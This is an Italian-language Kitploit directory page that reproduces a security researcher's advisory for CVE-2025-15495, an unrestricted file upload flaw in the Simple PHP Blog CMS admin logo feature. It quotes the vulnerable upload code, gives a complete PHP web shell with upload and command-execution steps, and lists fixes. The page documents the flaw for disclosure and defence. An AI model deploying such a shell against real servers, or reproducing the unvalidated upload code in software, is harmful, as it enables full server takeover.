Directory degli strumenti
Categorie
RCE-Simplephpblog-biggiedroid — CVE-2025-15495 - Caricamento arbitrario di file che porta all'esecuzione remota di codice (RCE) | Kitploit
Strumenti / GitHub / asim-qazi / rce-simplephpblog-biggiedroid
asim-qazi/rce-simplephpblog-biggiedroid RCE-Simplephpblog-biggiedroid CVE-2025-15495 - Caricamento arbitrario di file che porta all'esecuzione remota di codice (RCE)
Scopri gli strumenti più utilizzati dalla nostra community.
Ultimi 7 Giorni Ultimi 30 Giorni
9 8 mesi faCVE-2025-15495 - Caricamento Arbitrario di File Che Porta all'Esecuzione Remota di Codice (RCE)
Prodotto
BiggiDroid – Simple PHP Blog CMS
Pagina del prodotto: https://biggidroid.com/product/simple-php-blog/
Tipo di Vulnerabilità
Caricamento Arbitrario di File
Caricamento di File senza Restrizioni
Esecuzione Remota di Codice (RCE)
Gravità
Critica
CVSS (Stimato): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Riepilogo
Il Simple PHP Blog CMS contiene una vulnerabilità di caricamento file senza restrizioni nella funzionalità di caricamento del Logo del Sito del pannello di amministrazione.
Un attaccante autenticato può caricare un file PHP malevolo travestito da immagine, che viene memorizzato in una directory accessibile dal web ed eseguito dal server, portando all'esecuzione remota di comandi .
Componente Affetto
Pannello di Amministrazione → Aggiorna Logo del Sito
Estratto di codice vulnerabile rilevante:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// success
}
Problemi
Nessuna validazione dell'estensione del file
Nessuna validazione del tipo MIME
Nessun controllo del contenuto del file lato server
Prova di Concetto (PoC)
Creare un File PHP Malevolo Crea un file chiamato shell.php:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
Caricare il File tramite il Pannello di Amministrazione
Accedi al pannello di amministrazione
Vai su Logo del Sito → Aggiorna Logo
Carica shell.php come file logo
Invia il modulo
📌 L'applicazione accetta il file PHP senza validazione
Accedere alla Web Shell Caricata Dopo il caricamento, il file è accessibile all'indirizzo:
http://127.0.0.1/image/shell.php
Esegui comandi di sistema:
http://127.0.0.1/image/shell.php?cmd=dir
Esecuzione del Comando Riuscita Il server esegue comandi del sistema operativo e restituisce l'output, confermando l'Esecuzione Remota di Codice .
Prova di Concetto
Pagina del Prodotto
Carica la Shell da questa posizione.
Shell PHP
Esecuzione Remota di Codice
Codice Vulnerabile
Impatto
Eseguire comandi arbitrari del sistema operativo
Leggere file di configurazione sensibili
Modificare o eliminare dati dell'applicazione
Caricare backdoor persistenti
Compromettere completamente il server di hosting
Questa vulnerabilità può portare alla completa compromissione del server .
Analisi delle Cause Radice
Assenza di whitelist delle estensioni dei file
Nessun controllo del tipo MIME
Uso diretto del nome del file fornito dall'utente
La directory di upload consente l'esecuzione di PHP
Nessun file .htaccess / hardening del server
✅ Correzioni Raccomandate
Limitare le estensioni dei file
$allowed = ['jpg','jpeg','png','gif'];
Validare il tipo MIME
Rinominare i file caricati
Usare UUID casuali
Non fidarsi mai dei nomi dei file forniti dall'utente
📚 Riferimenti
OWASP Unrestricted File Upload
CWE-434: Unrestricted Upload of File with Dangerous Type
OWASP Top 10 – A03: Injection
🧑💻 Scoperto Da
Mo Asim conosciuto anche come Asim Qazi
Github: @Asim-Qazi
Linkedin: Asim Qazi
Studente | Ricercatore di Sicurezza